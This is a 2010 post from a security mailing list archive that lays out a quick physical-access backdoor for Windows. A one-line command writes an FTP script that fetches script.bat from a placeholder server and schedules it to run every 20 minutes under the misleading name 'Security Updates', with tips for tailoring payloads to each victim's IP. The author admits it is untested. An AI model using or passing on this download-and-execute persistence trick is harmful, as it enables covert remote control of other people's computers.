PaulDotCom mailing list archives

Quick keyboard pwnage

From: NSweaney at tulsacash.com (Nathan Sweaney)
Date: Tue, 16 Mar 2010 08:59:41 -0500

Don't forget that telnet isn't installed by default on Vista & 7.

What about something like this:

echo open ftp.somesite.com > %WINDIR%\ftp.scr & echo anonymous >> %WINDIR%\ftp.scr & echo bill at gates.com >>
%WINDIR%\ftp.scr & echo get script.bat >> %WINDIR%\ftp.scr & echo quit >> %WINDIR%\ftp.scr & echo ftp -s:ftp.scr >
%WINDIR%\security.bat & echo start %WINDIR%\script.bat >> %WINDIR%\security.bat & schtasks /create /tn "Security
Updates" /sc minute /mo 20 /tr security.bat

I haven't tested it so I may have some syntax wrong, but the basic idea should work.  Now your box just checks in every
20 minutes & does whatever you put in script.bat.

If you wanted to get fancy, you could change script.bat to something like 123.123.123.123.bat (or whatever it's
external IP is).  Then just check your server logs to see who is connecting & you can customize your scripts to each
location.  That may take a little more fancy kung fu to get your external IP though.

nathan